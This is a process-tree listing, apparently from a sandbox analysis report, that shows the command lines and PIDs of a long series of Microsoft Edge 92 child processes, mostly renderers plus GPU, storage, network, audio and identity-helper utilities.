C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2168,5000231633857498979,240127679884411341,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2124 /prefetch:212⤵PID:6660
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2168,5000231633857498979,240127679884411341,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2540 /prefetch:812⤵PID:8684
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2168,5000231633857498979,240127679884411341,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2240 /prefetch:312⤵PID:8672
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,5000231633857498979,240127679884411341,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3728 /prefetch:112⤵PID:29224
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,5000231633857498979,240127679884411341,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3736 /prefetch:112⤵PID:29628
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2168,5000231633857498979,240127679884411341,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=5140 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.22000.1 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=5316 /prefetch:212⤵PID:31312
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.62\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.62\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2168,5000231633857498979,240127679884411341,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5188 /prefetch:812⤵PID:48924
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.62\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.62\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2168,5000231633857498979,240127679884411341,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5188 /prefetch:812⤵PID:49896
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,5000231633857498979,240127679884411341,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3228 /prefetch:112⤵PID:3824
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,5000231633857498979,240127679884411341,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2484 /prefetch:112⤵PID:1912
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,5000231633857498979,240127679884411341,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5292 /prefetch:112⤵PID:8516
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,5000231633857498979,240127679884411341,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3464 /prefetch:112⤵PID:10992
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,5000231633857498979,240127679884411341,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5732 /prefetch:112⤵PID:11080
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,5000231633857498979,240127679884411341,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5276 /prefetch:112⤵PID:32340
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,5000231633857498979,240127679884411341,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5628 /prefetch:112⤵PID:32572
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,5000231633857498979,240127679884411341,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6020 /prefetch:112⤵PID:35256
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,5000231633857498979,240127679884411341,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=18 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3080 /prefetch:112⤵PID:35392
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,5000231633857498979,240127679884411341,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=19 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4028 /prefetch:112⤵PID:35480
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,5000231633857498979,240127679884411341,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=20 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6480 /prefetch:112⤵PID:35548
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,5000231633857498979,240127679884411341,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=21 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5876 /prefetch:112⤵PID:35964
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,5000231633857498979,240127679884411341,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=22 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5380 /prefetch:112⤵PID:36296
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,5000231633857498979,240127679884411341,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=23 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6468 /prefetch:112⤵PID:3572
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,5000231633857498979,240127679884411341,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=24 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5600 /prefetch:112⤵PID:37884
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,5000231633857498979,240127679884411341,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=25 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6024 /prefetch:112⤵PID:38120
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --field-trial-handle=2168,5000231633857498979,240127679884411341,131072 --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=4108 /prefetch:812⤵PID:38164
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,5000231633857498979,240127679884411341,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=28 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5240 /prefetch:112⤵PID:38188
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,5000231633857498979,240127679884411341,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=29 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6324 /prefetch:112⤵PID:38412
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,5000231633857498979,240127679884411341,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=30 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5448 /prefetch:112⤵PID:38668
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,5000231633857498979,240127679884411341,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=34 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6760 /prefetch:112⤵PID:40044
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,5000231633857498979,240127679884411341,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=35 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4124 /prefetch:112⤵PID:40276
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,5000231633857498979,240127679884411341,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=36 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5280 /prefetch:112⤵PID:40440
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,5000231633857498979,240127679884411341,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=37 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7060 /prefetch:112⤵PID:40708
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,5000231633857498979,240127679884411341,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=40 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6648 /prefetch:112⤵PID:42088
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,5000231633857498979,240127679884411341,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=41 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6344 /prefetch:112⤵PID:42392
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,5000231633857498979,240127679884411341,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=42 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6616 /prefetch:112⤵PID:42420
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,5000231633857498979,240127679884411341,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=43 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6704 /prefetch:112⤵PID:42652
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,5000231633857498979,240127679884411341,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=44 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6668 /prefetch:112⤵PID:47368
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,5000231633857498979,240127679884411341,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=45 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6572 /prefetch:112⤵PID:47584
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,5000231633857498979,240127679884411341,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=46 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1656 /prefetch:112⤵PID:50188
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,5000231633857498979,240127679884411341,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=47 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7328 /prefetch:112⤵PID:50408
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,5000231633857498979,240127679884411341,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=48 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7388 /prefetch:112⤵PID:50628
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,5000231633857498979,240127679884411341,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=49 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6344 /prefetch:112⤵PID:51052
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,5000231633857498979,240127679884411341,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=50 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6864 /prefetch:112⤵PID:51108
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,5000231633857498979,240127679884411341,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=51 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7020 /prefetch:112⤵PID:44136
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,5000231633857498979,240127679884411341,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=52 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7544 /prefetch:112⤵PID:44360
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,5000231633857498979,240127679884411341,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=53 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6580 /prefetch:112⤵PID:44644
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,5000231633857498979,240127679884411341,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=54 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4240 /prefetch:112⤵PID:44820
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,5000231633857498979,240127679884411341,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=55 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1800 /prefetch:112⤵PID:45880
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,5000231633857498979,240127679884411341,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=56 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3964 /prefetch:112⤵PID:11728
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,5000231633857498979,240127679884411341,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=57 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7872 /prefetch:112⤵PID:11764
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,5000231633857498979,240127679884411341,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=58 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7604 /prefetch:112⤵PID:12076
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,5000231633857498979,240127679884411341,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=59 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7628 /prefetch:112⤵PID:12176
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,5000231633857498979,240127679884411341,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=60 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6868 /prefetch:112⤵PID:12244
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,5000231633857498979,240127679884411341,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=61 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7488 /prefetch:112⤵PID:40664
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,5000231633857498979,240127679884411341,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=62 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8092 /prefetch:112⤵PID:13464
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,5000231633857498979,240127679884411341,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=63 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3888 /prefetch:112⤵PID:13840
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,5000231633857498979,240127679884411341,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=64 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7968 /prefetch:112⤵PID:14000
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,5000231633857498979,240127679884411341,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=65 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3168 /prefetch:112⤵PID:16040
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,5000231633857498979,240127679884411341,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=66 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7772 /prefetch:112⤵PID:16264
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,5000231633857498979,240127679884411341,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=67 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1660 /prefetch:112⤵PID:16836
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,5000231633857498979,240127679884411341,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=68 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7520 /prefetch:112⤵PID:17176
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,5000231633857498979,240127679884411341,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=69 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5908 /prefetch:112⤵PID:19516
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,5000231633857498979,240127679884411341,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=70 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8528 /prefetch:112⤵PID:19724
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,5000231633857498979,240127679884411341,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=71 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5908 /prefetch:112⤵PID:20300
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,5000231633857498979,240127679884411341,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=72 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7072 /prefetch:112⤵PID:20508
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,5000231633857498979,240127679884411341,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=73 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7040 /prefetch:112⤵PID:21860
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,5000231633857498979,240127679884411341,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=74 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8208 /prefetch:112⤵PID:22408
-
-
